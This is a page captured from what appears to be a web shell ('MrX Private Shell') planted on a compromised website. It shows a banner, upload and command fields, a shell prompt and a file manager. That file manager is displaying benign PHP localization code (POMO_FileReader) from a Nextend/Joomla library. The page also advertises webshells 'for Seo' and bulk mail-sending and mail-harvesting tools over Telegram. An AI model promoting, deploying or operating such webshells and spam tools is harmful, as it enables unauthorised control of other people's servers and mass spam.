__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php


namespace Nextend\Framework\Localization\Joomla\Pomo;


class POMO_FileReader extends POMO_Reader {

    protected $_f;

    /**
     * @param string $filename
     */
    function __construct($filename) {
        parent::__construct();
        $this->_f = fopen($filename, 'rb');
    }

    /**
     * @param int $bytes
     */
    function read($bytes) {
        return fread($this->_f, $bytes);
    }

    /**
     * @param int $pos
     *
     * @return boolean
     */
    function seekto($pos) {
        if (-1 == fseek($this->_f, $pos, SEEK_SET)) {
            return false;
        }
        $this->_pos = $pos;

        return true;
    }

    /**
     * @return bool
     */
    function is_resource() {
        return is_resource($this->_f);
    }

    /**
     * @return bool
     */
    function feof() {
        return feof($this->_f);
    }

    /**
     * @return bool
     */
    function close() {
        return fclose($this->_f);
    }

    /**
     * @return string
     */
    function read_all() {
        $all = '';
        while (!$this->feof()) $all .= $this->read(4096);

        return $all;
    }
}

Filemanager

Name Type Size Permission Actions
Gettext_Translations.php File 4.06 KB 0664
MO.php File 9.83 KB 0664
NOOP_Translations.php File 1.55 KB 0664
POMO_CachedFileReader.php File 384 B 0664
POMO_CachedIntFileReader.php File 188 B 0664
POMO_FileReader.php File 1.11 KB 0664
POMO_Reader.php File 2.92 KB 0664
POMO_StringReader.php File 1.22 KB 0664
Plural_Forms.php File 10.02 KB 0664
Translation_Entry.php File 3.21 KB 0664
Translations.php File 4.79 KB 0664
Filemanager